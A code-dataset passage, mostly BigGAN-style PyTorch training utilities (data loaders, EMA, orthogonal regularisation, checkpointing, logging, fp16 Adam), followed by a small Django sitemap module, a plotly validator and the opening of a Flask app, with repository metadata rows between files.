'I32_hdf5': dset.ILSVRC_HDF5, 'I64_hdf5': dset.ILSVRC_HDF5,
'I128_hdf5': dset.ILSVRC_HDF5, 'I256_hdf5': dset.ILSVRC_HDF5,
'C10': dset.CIFAR10, 'C100': dset.CIFAR100}
imsize_dict = {'I32': 32, 'I32_hdf5': 32,
'I64': 64, 'I64_hdf5': 64,
'I128': 128, 'I128_hdf5': 128,
'I256': 256, 'I256_hdf5': 256,
'C10': 32, 'C100': 32}
root_dict = {'I32': 'ImageNet', 'I32_hdf5': 'ILSVRC32.hdf5',
'I64': 'ImageNet', 'I64_hdf5': 'ILSVRC64.hdf5',
'I128': 'ImageNet', 'I128_hdf5': 'ILSVRC128.hdf5',
'I256': 'ImageNet', 'I256_hdf5': 'ILSVRC256.hdf5',
'C10': 'cifar', 'C100': 'cifar'}
nclass_dict = {'I32': 1000, 'I32_hdf5': 1000,
'I64': 1000, 'I64_hdf5': 1000,
'I128': 1000, 'I128_hdf5': 1000,
'I256': 1000, 'I256_hdf5': 1000,
'C10': 10, 'C100': 100}
# Number of classes to put per sample sheet
classes_per_sheet_dict = {'I32': 50, 'I32_hdf5': 50,
'I64': 50, 'I64_hdf5': 50,
'I128': 20, 'I128_hdf5': 20,
'I256': 20, 'I256_hdf5': 20,
'C10': 10, 'C100': 100}
activation_dict = {'inplace_relu': nn.ReLU(inplace=True),
'relu': nn.ReLU(inplace=False),
'ir': nn.ReLU(inplace=True),}
class CenterCropLongEdge(object):
"""Crops the given PIL Image on the long edge.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
return transforms.functional.center_crop(img, min(img.size))
def __repr__(self):
return self.__class__.__name__
class RandomCropLongEdge(object):
"""Crops the given PIL Image on the long edge with a random start point.
Args:
size (sequence or int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
"""
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
size = (min(img.size), min(img.size))
# Only step forward along this edge if it's the long edge
i = (0 if size[0] == img.size[0]
else np.random.randint(low=0,high=img.size[0] - size[0]))
j = (0 if size[1] == img.size[1]
else np.random.randint(low=0,high=img.size[1] - size[1]))
return transforms.functional.crop(img, i, j, size[0], size[1])
def __repr__(self):
return self.__class__.__name__
# multi-epoch Dataset sampler to avoid memory leakage and enable resumption of
# training from the same sample regardless of if we stop mid-epoch
class MultiEpochSampler(torch.utils.data.Sampler):
r"""Samples elements randomly over multiple epochs
Arguments:
data_source (Dataset): dataset to sample from
num_epochs (int) : Number of times to loop over the dataset
start_itr (int) : which iteration to begin from
"""
def __init__(self, data_source, num_epochs, start_itr=0, batch_size=128):
self.data_source = data_source
self.num_samples = len(self.data_source)
self.num_epochs = num_epochs
self.start_itr = start_itr
self.batch_size = batch_size
if not isinstance(self.num_samples, int) or self.num_samples <= 0:
raise ValueError("num_samples should be a positive integeral "
"value, but got num_samples={}".format(self.num_samples))
def __iter__(self):
n = len(self.data_source)
# Determine number of epochs
num_epochs = int(np.ceil((n * self.num_epochs
- (self.start_itr * self.batch_size)) / float(n)))
# Sample all the indices, and then grab the last num_epochs index sets;
# This ensures if we're starting at epoch 4, we're still grabbing epoch 4's
# indices
out = [torch.randperm(n) for epoch in range(self.num_epochs)][-num_epochs:]
# Ignore the first start_itr % n indices of the first epoch
out[0] = out[0][(self.start_itr * self.batch_size % n):]
# if self.replacement:
# return iter(torch.randint(high=n, size=(self.num_samples,), dtype=torch.int64).tolist())
# return iter(.tolist())
output = torch.cat(out).tolist()
print('Length dataset output is %d' % len(output))
return iter(output)
def __len__(self):
return len(self.data_source) * self.num_epochs - self.start_itr * self.batch_size
# Convenience function to centralize all data loaders
def get_data_loaders(dataset, data_root=None, augment=False, batch_size=64,
num_workers=8, shuffle=True, load_in_mem=False, hdf5=False,
pin_memory=True, drop_last=True, start_itr=0,
num_epochs=500, use_multiepoch_sampler=False,
**kwargs):
# Append /FILENAME.hdf5 to root if using hdf5
data_root += '/%s' % root_dict[dataset]
print('Using dataset root location %s' % data_root)
which_dataset = dset_dict[dataset]
norm_mean = [0.5,0.5,0.5]
norm_std = [0.5,0.5,0.5]
image_size = imsize_dict[dataset]
# For image folder datasets, name of the file where we store the precomputed
# image locations to avoid having to walk the dirs every time we load.
dataset_kwargs = {'index_filename': '%s_imgs.npz' % dataset}
# HDF5 datasets have their own inbuilt transform, no need to train_transform
if 'hdf5' in dataset:
train_transform = None
else:
if augment:
print('Data will be augmented...')
if dataset in ['C10', 'C100']:
train_transform = [transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()]
else:
train_transform = [RandomCropLongEdge(),
transforms.Resize(image_size),
transforms.RandomHorizontalFlip()]
else:
print('Data will not be augmented...')
if dataset in ['C10', 'C100']:
train_transform = []
else:
train_transform = [CenterCropLongEdge(), transforms.Resize(image_size)]
# train_transform = [transforms.Resize(image_size), transforms.CenterCrop]
train_transform = transforms.Compose(train_transform + [
transforms.ToTensor(),
transforms.Normalize(norm_mean, norm_std)])
train_set = which_dataset(root=data_root, transform=train_transform,
load_in_mem=load_in_mem, **dataset_kwargs)
# Prepare loader; the loaders list is for forward compatibility with
# using validation / test splits.
loaders = []
if use_multiepoch_sampler:
print('Using multiepoch sampler from start_itr %d...' % start_itr)
loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory}
sampler = MultiEpochSampler(train_set, num_epochs, start_itr, batch_size)
train_loader = DataLoader(train_set, batch_size=batch_size,
sampler=sampler, **loader_kwargs)
else:
loader_kwargs = {'num_workers': num_workers, 'pin_memory': pin_memory,
'drop_last': drop_last} # Default, drop last incomplete batch
train_loader = DataLoader(train_set, batch_size=batch_size,
shuffle=shuffle, **loader_kwargs)
loaders.append(train_loader)
return loaders
# Utility file to seed rngs
def seed_rng(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
# Utility to peg all roots to a base root
# If a base root folder is provided, peg all other root folders to it.
def update_config_roots(config):
if config['base_root']:
print('Pegging all root folders to base root %s' % config['base_root'])
for key in ['data', 'weights', 'logs', 'samples']:
config['%s_root' % key] = '%s/%s' % (config['base_root'], key)
return config
# Utility to prepare root folders if they don't exist; parent folder must exist
def prepare_root(config):
for key in ['weights_root', 'logs_root', 'samples_root']:
if not os.path.exists(config[key]):
print('Making directory %s for %s...' % (config[key], key))
os.mkdir(config[key])
# Simple wrapper that applies EMA to a model. COuld be better done in 1.0 using
# the parameters() and buffers() module functions, but for now this works
# with state_dicts using .copy_
class ema(object):
def __init__(self, source, target, decay=0.9999, start_itr=0):
self.source = source
self.target = target
self.decay = decay
# Optional parameter indicating what iteration to start the decay at
self.start_itr = start_itr
# Initialize target's params to be source's
self.source_dict = self.source.state_dict()
self.target_dict = self.target.state_dict()
print('Initializing EMA parameters to be source parameters...')
with torch.no_grad():
for key in self.source_dict:
self.target_dict[key].data.copy_(self.source_dict[key].data)
# target_dict[key].data = source_dict[key].data # Doesn't work!
def update(self, itr=None):
# If an iteration counter is provided and itr is less than the start itr,
# peg the ema weights to the underlying weights.
if itr and itr < self.start_itr:
decay = 0.0
else:
decay = self.decay
with torch.no_grad():
for key in self.source_dict:
self.target_dict[key].data.copy_(self.target_dict[key].data * decay
+ self.source_dict[key].data * (1 - decay))
# Apply modified ortho reg to a model
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def ortho(model, strength=1e-4, blacklist=[]):
with torch.no_grad():
for param in model.parameters():
# Only apply this to parameters with at least 2 axes, and not in the blacklist
if len(param.shape) < 2 or any([param is item for item in blacklist]):
continue
w = param.view(param.shape[0], -1)
grad = (2 * torch.mm(torch.mm(w, w.t())
* (1. - torch.eye(w.shape[0], device=w.device)), w))
param.grad.data += strength * grad.view(param.shape)
# Default ortho reg
# This function is an optimized version that directly computes the gradient,
# instead of computing and then differentiating the loss.
def default_ortho(model, strength=1e-4, blacklist=[]):
with torch.no_grad():
for param in model.parameters():
# Only apply this to parameters with at least 2 axes & not in blacklist
if len(param.shape) < 2 or param in blacklist:
continue
w = param.view(param.shape[0], -1)
grad = (2 * torch.mm(torch.mm(w, w.t())
- torch.eye(w.shape[0], device=w.device), w))
param.grad.data += strength * grad.view(param.shape)
# Convenience utility to switch off requires_grad
def toggle_grad(model, on_or_off):
for param in model.parameters():
param.requires_grad = on_or_off
# Function to join strings or ignore them
# Base string is the string to link "strings," while strings
# is a list of strings or Nones.
def join_strings(base_string, strings):
return base_string.join([item for item in strings if item])
# Save a model's weights, optimizer, and the state_dict
def save_weights(G, D, state_dict, weights_root, experiment_name,
name_suffix=None, G_ema=None):
root = '/'.join([weights_root, experiment_name])
if not os.path.exists(root):
os.mkdir(root)
if name_suffix:
print('Saving weights to %s/%s...' % (root, name_suffix))
else:
print('Saving weights to %s...' % root)
torch.save(G.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G', name_suffix])))
torch.save(G.optim.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix])))
torch.save(D.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['D', name_suffix])))
torch.save(D.optim.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix])))
torch.save(state_dict,
'%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))
if G_ema is not None:
torch.save(G_ema.state_dict(),
'%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix])))
def load_state_dict(model, state_dict, strict=True):
keys_p = list(state_dict.keys())
keys_r = list(model.state_dict().keys())
keys_r_miss = [k for k in keys_r if k not in keys_p]
keys_p_miss = [k for k in keys_p if k not in keys_r]
model.load_state_dict(state_dict, strict=strict)
if len(keys_r_miss) > 0:
print("No param in provided state dict: {}".format(str(keys_r_miss)))
if len(keys_p_miss) > 0:
print("No param in the model: {}".format(str(keys_p_miss)))
# Load a model's weights, optimizer, and the state_dict
def load_weights(G, D, state_dict, weights_root, experiment_name,
name_suffix=None, G_ema=None, strict=True, load_optim=True):
root = '/'.join([weights_root, experiment_name])
if name_suffix:
print('Loading %s weights from %s...' % (name_suffix, root))
else:
print('Loading weights from %s...' % root)
if G is not None:
G.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G', name_suffix]))),
strict=strict)
if load_optim:
G.optim.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G_optim', name_suffix]))))
if D is not None:
D.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['D', name_suffix]))),
strict=strict)
if load_optim:
D.optim.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['D_optim', name_suffix]))))
# Load state dict
for item in state_dict:
state_dict[item] = torch.load('%s/%s.pth' % (root, join_strings('_', ['state_dict', name_suffix])))[item]
if G_ema is not None:
G_ema.load_state_dict(
torch.load('%s/%s.pth' % (root, join_strings('_', ['G_ema', name_suffix]))),
strict=strict)
''' MetricsLogger originally stolen from VoxNet source code.
Used for logging inception metrics'''
class MetricsLogger(object):
def __init__(self, fname, reinitialize=False):
self.fname = fname
self.reinitialize = reinitialize
if os.path.exists(self.fname):
if self.reinitialize:
print('{} exists, deleting...'.format(self.fname))
os.remove(self.fname)
def log(self, record=None, **kwargs):
"""
Assumption: no newlines in the input.
"""
if record is None:
record = {}
record.update(kwargs)
record['_stamp'] = time.time()
with open(self.fname, 'a') as f:
f.write(json.dumps(record, ensure_ascii=True) + '\n')
# Logstyle is either:
# '%#.#f' for floating point representation in text
# '%#.#e' for exponent representation in text
# 'npz' for output to npz # NOT YET SUPPORTED
# 'pickle' for output to a python pickle # NOT YET SUPPORTED
# 'mat' for output to a MATLAB .mat file # NOT YET SUPPORTED
class MyLogger(object):
def __init__(self, fname, reinitialize=False, logstyle='%3.3f'):
self.root = fname
if not os.path.exists(self.root):
os.mkdir(self.root)
self.reinitialize = reinitialize
self.metrics = []
self.logstyle = logstyle # One of '%3.3f' or like '%3.3e'
# Delete log if re-starting and log already exists
def reinit(self, item):
if os.path.exists('%s/%s.log' % (self.root, item)):
if self.reinitialize:
# Only print the removal mess
if 'sv' in item :
if not any('sv' in item for item in self.metrics):
print('Deleting singular value logs...')
else:
print('{} exists, deleting...'.format('%s_%s.log' % (self.root, item)))
os.remove('%s/%s.log' % (self.root, item))
# Log in plaintext; this is designed for being read in MATLAB(sorry not sorry)
def log(self, itr, **kwargs):
for arg in kwargs:
if arg not in self.metrics:
if self.reinitialize:
self.reinit(arg)
self.metrics += [arg]
if self.logstyle == 'pickle':
print('Pickle not currently supported...')
# with open('%s/%s.log' % (self.root, arg), 'a') as f:
# pickle.dump(kwargs[arg], f)
elif self.logstyle == 'mat':
print('.mat logstyle not currently supported...')
else:
with open('%s/%s.log' % (self.root, arg), 'a') as f:
f.write('%d: %s\n' % (itr, self.logstyle % kwargs[arg]))
# Write some metadata to the logs directory
def write_metadata(logs_root, experiment_name, config, state_dict):
with open(('%s/%s/metalog.txt' %
(logs_root, experiment_name)), 'w') as writefile:
writefile.write('datetime: %s\n' % str(datetime.datetime.now()))
writefile.write('config: %s\n' % str(config))
writefile.write('state: %s\n' %str(state_dict))
"""
Very basic progress indicator to wrap an iterable in.
Author: Jan Schlüter
Andy's adds: time elapsed in addition to ETA, makes it possible to add
estimated time to 1k iters instead of estimated time to completion.
"""
def progress(items, desc='', total=None, min_delay=0.1, displaytype='s1k'):
"""
Returns a generator over `items`, printing the number and percentage of
items processed and the estimated remaining processing time before yielding
the next item. `total` gives the total number of items (required if `items`
has no length), and `min_delay` gives the minimum time in seconds between
subsequent prints. `desc` gives an optional prefix text (end with a space).
"""
total = total or len(items)
t_start = time.time()
t_last = 0
for n, item in enumerate(items):
t_now = time.time()
if t_now - t_last > min_delay:
print("\r%s%d/%d (%6.2f%%)" % (
desc, n+1, total, n / float(total) * 100), end=" ")
if n > 0:
if displaytype == 's1k': # minutes/seconds for 1000 iters
next_1000 = n + (1000 - n%1000)
t_done = t_now - t_start
t_1k = t_done / n * next_1000
outlist = list(divmod(t_done, 60)) + list(divmod(t_1k - t_done, 60))
print("(TE/ET1k: %d:%02d / %d:%02d)" % tuple(outlist), end=" ")
else:# displaytype == 'eta':
t_done = t_now - t_start
t_total = t_done / n * total
outlist = list(divmod(t_done, 60)) + list(divmod(t_total - t_done, 60))
print("(TE/ETA: %d:%02d / %d:%02d)" % tuple(outlist), end=" ")
sys.stdout.flush()
t_last = t_now
yield item
t_total = time.time() - t_start
print("\r%s%d/%d (100.00%%) (took %d:%02d)" % ((desc, total, total) +
divmod(t_total, 60)))
# Sample function for use with inception metrics
def sample(G, z_, y_, config):
with torch.no_grad():
z_.sample_()
y_.sample_()
if config['parallel']:
G_z = nn.parallel.data_parallel(G, (z_, G.shared(y_)))
else:
G_z = G(z_, G.shared(y_))
return G_z, y_
# Sample function for sample sheets
def sample_sheet(G, classes_per_sheet, num_classes, samples_per_class, parallel,
samples_root, experiment_name, folder_number, z_=None):
# Prepare sample directory
if not os.path.isdir('%s/%s' % (samples_root, experiment_name)):
os.mkdir('%s/%s' % (samples_root, experiment_name))
if not os.path.isdir('%s/%s/%d' % (samples_root, experiment_name, folder_number)):
os.mkdir('%s/%s/%d' % (samples_root, experiment_name, folder_number))
# loop over total number of sheets
for i in range(num_classes // classes_per_sheet):
ims = []
y = torch.arange(i * classes_per_sheet, (i + 1) * classes_per_sheet, device='cuda')
for j in range(samples_per_class):
if (z_ is not None) and hasattr(z_, 'sample_') and classes_per_sheet <= z_.size(0):
z_.sample_()
else:
z_ = torch.randn(classes_per_sheet, G.dim_z, device='cuda')
with torch.no_grad():
if parallel:
o = nn.parallel.data_parallel(G, (z_[:classes_per_sheet], G.shared(y)))
else:
o = G(z_[:classes_per_sheet], G.shared(y))
ims += [o.data.cpu()]
# This line should properly unroll the images
out_ims = torch.stack(ims, 1).view(-1, ims[0].shape[1], ims[0].shape[2],
ims[0].shape[3]).data.float().cpu()
# The path for the samples
image_filename = '%s/%s/%d/samples%d.jpg' % (samples_root, experiment_name,
folder_number, i)
torchvision.utils.save_image(out_ims, image_filename,
nrow=samples_per_class, normalize=True)
# Interp function; expects x0 and x1 to be of shape (shape0, 1, rest_of_shape..)
def interp(x0, x1, num_midpoints):
"""
x0: [bs, 1, d]
x1: [bs, 1, d]
"""
lerp = torch.linspace(0, 1.0, num_midpoints + 2, device='cuda').to(x0.dtype) # [num_midpoints+2]
return ((x0 * (1 - lerp.view(1, -1, 1))) + (x1 * lerp.view(1, -1, 1)))
# interp sheet function
# Supports full, class-wise and intra-class interpolation
def interp_sheet(G, num_per_sheet, num_midpoints, num_classes, parallel,
samples_root, experiment_name, folder_number, sheet_number=0,
fix_z=False, fix_y=False, device='cuda'):
# Prepare zs and ys
if fix_z: # If fix Z, only sample 1 z per row
zs = torch.randn(num_per_sheet, 1, G.dim_z, device=device)
zs = zs.repeat(1, num_midpoints + 2, 1).view(-1, G.dim_z)
else:
zs = interp(torch.randn(num_per_sheet, 1, G.dim_z, device=device),
torch.randn(num_per_sheet, 1, G.dim_z, device=device),
num_midpoints).view(-1, G.dim_z)
if fix_y: # If fix y, only sample 1 z per row
ys = sample_1hot(num_per_sheet, num_classes)
ys = G.shared(ys).view(num_per_sheet, 1, -1)
ys = ys.repeat(1, num_midpoints + 2, 1).view(num_per_sheet * (num_midpoints + 2), -1)
else:
ys = interp(G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
G.shared(sample_1hot(num_per_sheet, num_classes)).view(num_per_sheet, 1, -1),
num_midpoints).view(num_per_sheet * (num_midpoints + 2), -1)
# Run the net--note that we've already passed y through G.shared.
if G.fp16:
zs = zs.half()
with torch.no_grad():
if parallel:
out_ims = nn.parallel.data_parallel(G, (zs, ys)).data.cpu()
else:
out_ims = G(zs, ys).data.cpu()
interp_style = '' + ('Z' if not fix_z else '') + ('Y' if not fix_y else '')
image_filename = '%s/%s/%d/interp%s%d.jpg' % (samples_root, experiment_name,
folder_number, interp_style,
sheet_number)
torchvision.utils.save_image(out_ims, image_filename,
nrow=num_midpoints + 2, normalize=True)
# Convenience debugging function to print out gradnorms and shape from each layer
# May need to rewrite this so we can actually see which parameter is which
def print_grad_norms(net):
gradsums = [[float(torch.norm(param.grad).item()),
float(torch.norm(param).item()), param.shape]
for param in net.parameters()]
order = np.argsort([item[0] for item in gradsums])
print(['%3.3e,%3.3e, %s' % (gradsums[item_index][0],
gradsums[item_index][1],
str(gradsums[item_index][2]))
for item_index in order])
# Get singular values to log. This will use the state dict to find them
# and substitute underscores for dots.
def get_SVs(net, prefix):
d = net.state_dict()
return {('%s_%s' % (prefix, key)).replace('.', '_') :
float(d[key].item())
for key in d if 'sv' in key}
# Name an experiment based on its config
def name_from_config(config):
name = '_'.join([
item for item in [
'Big%s' % config['which_train_fn'],
config['dataset'],
config['model'] if config['model'] != 'BigGAN' else None,
'seed%d' % config['seed'],
'Gch%d' % config['G_ch'],
'Dch%d' % config['D_ch'],
'Gd%d' % config['G_depth'] if config['G_depth'] > 1 else None,
'Dd%d' % config['D_depth'] if config['D_depth'] > 1 else None,
'bs%d' % config['batch_size'],
'Gfp16' if config['G_fp16'] else None,
'Dfp16' if config['D_fp16'] else None,
'nDs%d' % config['num_D_steps'] if config['num_D_steps'] > 1 else None,
'nDa%d' % config['num_D_accumulations'] if config['num_D_accumulations'] > 1 else None,
'nGa%d' % config['num_G_accumulations'] if config['num_G_accumulations'] > 1 else None,
'Glr%2.1e' % config['G_lr'],
'Dlr%2.1e' % config['D_lr'],
'GB%3.3f' % config['G_B1'] if config['G_B1'] !=0.0 else None,
'GBB%3.3f' % config['G_B2'] if config['G_B2'] !=0.999 else None,
'DB%3.3f' % config['D_B1'] if config['D_B1'] !=0.0 else None,
'DBB%3.3f' % config['D_B2'] if config['D_B2'] !=0.999 else None,
'Gnl%s' % config['G_nl'],
'Dnl%s' % config['D_nl'],
'Ginit%s' % config['G_init'],
'Dinit%s' % config['D_init'],
'G%s' % config['G_param'] if config['G_param'] != 'SN' else None,
'D%s' % config['D_param'] if config['D_param'] != 'SN' else None,
'Gattn%s' % config['G_attn'] if config['G_attn'] != '0' else None,
'Dattn%s' % config['D_attn'] if config['D_attn'] != '0' else None,
'Gortho%2.1e' % config['G_ortho'] if config['G_ortho'] > 0.0 else None,
'Dortho%2.1e' % config['D_ortho'] if config['D_ortho'] > 0.0 else None,
config['norm_style'] if config['norm_style'] != 'bn' else None,
'cr' if config['cross_replica'] else None,
'Gshared' if config['G_shared'] else None,
'hier' if config['hier'] else None,
'ema' if config['ema'] else None,
config['name_suffix'] if config['name_suffix'] else None,
]
if item is not None])
# dogball
if config['hashname']:
return hashname(name)
else:
return name
# A simple function to produce a unique experiment name from the animal hashes.
def hashname(name):
h = hash(name)
a = h % len(animal_hash.a)
h = h // len(animal_hash.a)
b = h % len(animal_hash.b)
h = h // len(animal_hash.c)
c = h % len(animal_hash.c)
return animal_hash.a[a] + animal_hash.b[b] + animal_hash.c[c]
# Get GPU memory, -i is the index
def query_gpu(indices):
os.system('nvidia-smi -i 0 --query-gpu=memory.free --format=csv')
# Convenience function to count the number of parameters in a module
def count_parameters(module):
print('Number of parameters: {}'.format(
sum([p.data.nelement() for p in module.parameters()])))
# Convenience function to sample an index, not actually a 1-hot
def sample_1hot(batch_size, num_classes, device='cuda'):
return torch.randint(low=0, high=num_classes, size=(batch_size,),
device=device, dtype=torch.int64, requires_grad=False)
# A highly simplified convenience class for sampling from distributions
# One could also use PyTorch's inbuilt distributions package.
# Note that this class requires initialization to proceed as
# x = Distribution(torch.randn(size))
# x.init_distribution(dist_type, **dist_kwargs)
# x = x.to(device,dtype)
# This is partially based on https://discuss.pytorch.org/t/subclassing-torch-tensor/23754/2
class Distribution(torch.Tensor):
# Init the params of the distribution
def init_distribution(self, dist_type, **kwargs):
self.dist_type = dist_type
self.dist_kwargs = kwargs
if self.dist_type == 'normal':
self.mean, self.var = kwargs['mean'], kwargs['var']
elif self.dist_type == 'categorical':
self.num_categories = kwargs['num_categories']
# if given the number of category ids, and each number of sampls for each categroy,
# the conditional y will be generated in the given manner
if 'num_categories_to_sample' in kwargs and 'per_category_to_sample' in kwargs:
if kwargs['num_categories_to_sample'] is not None and kwargs['per_category_to_sample'] is not None:
self.num_categories_to_sample = kwargs['num_categories_to_sample']
self.per_category_to_sample = kwargs['per_category_to_sample']
if self.num_categories_to_sample <= 0:
self.categories_to_sample = list(range(self.num_categories))
else:
categories = list(range(self.num_categories))
np.random.shuffle(categories)
self.categories_to_sample = categories[:self.num_categories_to_sample]
self.count = 0
self.total_count = len(self.categories_to_sample) * self.per_category_to_sample
self.next = True
def sample_(self):
if self.dist_type == 'normal':
self.normal_(self.mean, self.var)
elif self.dist_type == 'categorical':
if hasattr(self, 'categories_to_sample') and hasattr(self, 'per_category_to_sample'):
batch_size = self.shape[0]
count_cur = self.count + batch_size
cate_idx_pre = self.count // self.per_category_to_sample
cate_idx_cur = count_cur // self.per_category_to_sample
cate_id = self.categories_to_sample[cate_idx_pre:cate_idx_cur+1]
cate_id = torch.tensor(cate_id).unsqueeze(dim=1).repeat(1, self.per_category_to_sample).view(-1)
start_idx = self.count - self.per_category_to_sample * max(0, cate_idx_pre)
end_idx = start_idx + batch_size
if end_idx > cate_id.shape[0]:
cate_id = torch.cat((cate_id, cate_id), dim=0)
self.copy_(cate_id[start_idx:end_idx])
self.count = count_cur
self.next = self.count < self.total_count
else: # generate the category label randomly
self.random_(0, self.num_categories)
# return self.variable
# Silly hack: overwrite the to() method to wrap the new object
# in a distribution as well
def to(self, *args, **kwargs):
new_obj = Distribution(self)
new_obj.init_distribution(self.dist_type, **self.dist_kwargs)
new_obj.data = super().to(*args, **kwargs)
return new_obj
# Convenience function to prepare a z and y vector
def prepare_z_y(G_batch_size, dim_z, nclasses, device='cuda',
fp16=False,z_var=1.0, per_category_to_sample=None,
num_categories_to_sample=None):
z_ = Distribution(torch.randn(G_batch_size, dim_z, requires_grad=False))
z_.init_distribution('normal', mean=0, var=z_var)
z_ = z_.to(device,torch.float16 if fp16 else torch.float32)
if fp16:
z_ = z_.half()
y_ = Distribution(torch.zeros(G_batch_size, requires_grad=False))
y_.init_distribution('categorical',num_categories=nclasses,
per_category_to_sample=per_category_to_sample,
num_categories_to_sample=num_categories_to_sample)
y_ = y_.to(device, torch.int64)
return z_, y_
def initiate_standing_stats(net):
for module in net.modules():
if hasattr(module, 'accumulate_standing'):
module.reset_stats()
module.accumulate_standing = True
def accumulate_standing_stats(net, z, y, nclasses, num_accumulations=16):
initiate_standing_stats(net)
net.train()
for i in range(num_accumulations):
with torch.no_grad():
z.normal_()
y.random_(0, nclasses)
x = net(z, net.shared(y)) # No need to parallelize here unless using syncbn
# Set to eval mode
net.eval()
# This version of Adam keeps an fp32 copy of the parameters and
# does all of the parameter updates in fp32, while still doing the
# forwards and backwards passes using fp16 (i.e. fp16 copies of the
# parameters and fp16 activations).
#
# Note that this calls .float().cuda() on the params.
import math
from torch.optim.optimizer import Optimizer
class Adam16(Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay)
params = list(params)
super(Adam16, self).__init__(params, defaults)
# Safety modification to make sure we floatify our state
def load_state_dict(self, state_dict):
super(Adam16, self).load_state_dict(state_dict)
for group in self.param_groups:
for p in group['params']:
self.state[p]['exp_avg'] = self.state[p]['exp_avg'].float()
self.state[p]['exp_avg_sq'] = self.state[p]['exp_avg_sq'].float()
self.state[p]['fp32_p'] = self.state[p]['fp32_p'].float()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = grad.new().resize_as_(grad).zero_()
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()
# Fp32 copy of the weights
state['fp32_p'] = p.data.float()
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], state['fp32_p'])
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
state['fp32_p'].addcdiv_(-step_size, exp_avg, denom)
p.data = state['fp32_p'].half()
return loss
| 41.27673
| 109
| 0.647665
|
794b2bcd1edf31cf42f4e4fdf0deed65e35d3dd5
| 292
|
py
|
Python
|
slimbb/sitemap.py
|
hsoft/slimbb
|
763cb9e0f3daacdcba5cb2b913600a6351ea88e2
|
[
"BSD-3-Clause"
] | 1
|
2016-09-04T20:11:17.000Z
|
2016-09-04T20:11:17.000Z
|
slimbb/sitemap.py
|
hsoft/slimbb
|
763cb9e0f3daacdcba5cb2b913600a6351ea88e2
|
[
"BSD-3-Clause"
] | null | null | null |
slimbb/sitemap.py
|
hsoft/slimbb
|
763cb9e0f3daacdcba5cb2b913600a6351ea88e2
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib.sitemaps import Sitemap
from .models import Forum, Topic
class SitemapForum(Sitemap):
priority = 0.5
def items(self):
return Forum.objects.all()
class SitemapTopic(Sitemap):
priority = 0.5
def items(self):
return Topic.objects.all()
| 16.222222
| 43
| 0.678082
|
794b2bfe8fa481966e81921d4dd2a2b1270d0e22
| 513
|
py
|
Python
|
packages/python/plotly/plotly/validators/parcoords/line/_colorscale.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/parcoords/line/_colorscale.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/parcoords/line/_colorscale.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
import _plotly_utils.basevalidators
class ColorscaleValidator(_plotly_utils.basevalidators.ColorscaleValidator):
def __init__(
self, plotly_name="colorscale", parent_name="parcoords.line", **kwargs
):
super(ColorscaleValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
implied_edits=kwargs.pop("implied_edits", {"autocolorscale": False}),
**kwargs,
)
| 34.2
| 81
| 0.662768
|
794b2c650b06970b7d6e2a53648676d37bdaf727
| 2,152
|
py
|
Python
|
backend/src/app.py
|
gbernardino/RVparcellation
|
d6068f22eea4fe045f5ce7e19a54344c91a0090f
|
[
"MIT"
] | null | null | null |
backend/src/app.py
|
gbernardino/RVparcellation
|
d6068f22eea4fe045f5ce7e19a54344c91a0090f
|
[
"MIT"
] | null | null | null |
backend/src/app.py
|
gbernardino/RVparcellation
|
d6068f22eea4fe045f5ce7e19a54344c91a0090f
|
[
"MIT"
] | null | null | null |
from flask import Flask, send_file, jsonify
from flask_restful import Resource, Api, request
from flask_cors import CORS
import sys, os, pathlib
import computeRegionalVolumeDynamics, utilities
app = Flask(__name__)
api = Api(app)
CORS(app)
